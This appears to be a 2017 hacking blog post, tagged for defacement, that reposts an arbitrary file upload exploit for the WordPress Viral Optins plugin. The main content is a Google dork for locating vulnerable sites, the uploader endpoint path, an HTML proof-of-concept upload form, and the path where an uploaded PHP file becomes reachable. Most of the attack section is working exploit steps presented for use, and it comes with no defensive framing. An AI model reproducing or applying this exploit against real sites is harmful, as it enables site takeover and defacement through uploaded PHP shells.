WordPress Plugins Viral Optins - Arbitrary File Upload

Sunday, June 18, 2017

WordPress Plugins Viral Optins - Arbitrary File Upload

Unknown June 18, 2017 Deface, Hacking, Tips & Trik, xploit Comment

# Exploit Title: WordPress Plugins Viral Optins - Arbitrary File Upload
# Exploit Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/viral-optins/

2) Exploit the websites
https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/YYYY/MM/your-file.php

RezaArabGamers

thanks you buat kalian yang sudah membaca artikel blog saya

Sunday, June 18, 2017

WordPress Plugins Viral Optins - Arbitrary File Upload

0 comments:

Post a Comment

Popular Posts

Categories

Blog Archive

Report Abuse

Comments

Recent

Bottom Ad [Post Page]

Blog Archive

Search This Blog

Home Ads

Advertisement

Text Widget

Text Widget

Labels

About Me

Contact Form

Author Social Links

Label

Instagram

Label

Facebook

Follow us

Full width home advertisement

Recent Posts

Pages

Download

Flickr Images

Author Description

Instagram

Artikel Terbaru

Popular Posts

Popular Posts

Post Page Advertisement [Top]